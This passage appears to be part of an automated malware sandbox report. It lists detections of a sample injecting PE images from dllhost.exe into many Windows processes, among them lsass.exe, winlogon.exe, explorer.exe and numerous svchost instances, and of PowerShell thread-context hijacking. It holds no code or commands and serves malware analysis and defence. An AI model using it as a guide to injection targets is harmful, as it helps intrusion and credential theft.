Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 2220C4F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 2220AB60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1B4EB270000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 25872BC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe base: 34D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 24D9FF40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2D0D4FA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 123B8520000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 270F3B40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 270F3EC0000 value starts with: 4D5A
Injects code into the Windows Explorer (explorer.exe)
Source: C:\Windows\System32\dllhost.exe Memory written: PID: 2580 base: 1350000 value: 4D
Source: C:\Windows\System32\dllhost.exe Memory written: PID: 2580 base: 1350000 value: 4D
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: target process: 7744 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: target process: 2188
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: target process: 1420
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: target process: 8160
Writes to foreign memory regions
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe base: 8180000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140000000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140001000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140004000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140006000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140007000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: B71FCA7010
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\winlogon.exe base: 225DC610000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\winlogon.exe base: 225DC640000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\lsass.exe base: 202C0AB0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\lsass.exe base: 202C0AE0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2A6612D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2A661300000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dwm.exe base: 2BAAF1A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dwm.exe base: 2BAAF230000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 26A87990000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 17953770000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2295D530000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 253067D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1845B390000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1ADEBFD0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1D559040000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 241A9E70000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1CD73160000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2824E860000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 21B473C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2086F9D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 17183BC0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23FD3F70000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1D2A4150000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 275BDF30000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1AAC0260000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 203C9F30000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1B5645B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1BB7B2A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1C004F60000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 24E2AB40000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2644ADB0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\spoolsv.exe base: 1990000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 20D25DA0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 26EF5350000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2A7F0D60000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23D0FFB0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1B1C2570000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2108BA90000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 29166900000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13EF0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1988D570000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 13869B40000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1E1CC740000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2855DA70000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2BF199D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 15AF3890000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 21A03B80000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\sihost.exe base: 1CD40E40000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 151A6530000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 19E27BC0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 17D7B150000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1BE621A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2252F480000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\ctfmon.exe base: 1F28B4B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 184683D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\explorer.exe base: 1350000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1972E260000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dasHost.exe base: 2246C5E0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 221D5930000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC650000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1D1777C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1A633B40000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2928D0A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dllhost.exe base: 13DAB4C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\smartscreen.exe base: 1A22A640000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 21C6CF30000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1EF641A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\audiodg.exe base: 1D349350000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 23B60D80000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1DEA1600000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1F22F7C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 20C52340000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DA90000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F5602E0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1E97F230000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1217AF90000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1A680850000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 192A3140000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 3C70000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dllhost.exe base: 294E53C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2B83DFA0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1661BCE0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 5F0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 600000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 760000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 900000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 1050000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 530000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 1030000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 6A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: CC0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 1130000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 1080000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: DA0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: E70000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: E10000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: CA0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 760000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 14A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 11B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 13C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 1220000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: DB0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 700000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 500000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: AC0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 9D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 7A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 3A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: B30000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: E10000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: FF0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 1500000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 1300000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: B80000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 1210000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 9E0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 900000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 9C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: AA0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 690000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 1130000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 1110000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: BF0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 7D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: CC0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 9A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 5B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: B10000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 1350000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: F50000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: B70000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 7B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: F90000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 1140000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 620000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: DE0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 1210000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: C60000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 7C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: A50000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 190000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 600000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 1130000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 150000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: FD0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 5D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 830000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: D20000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 900000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 1250000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 3A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 11F0000
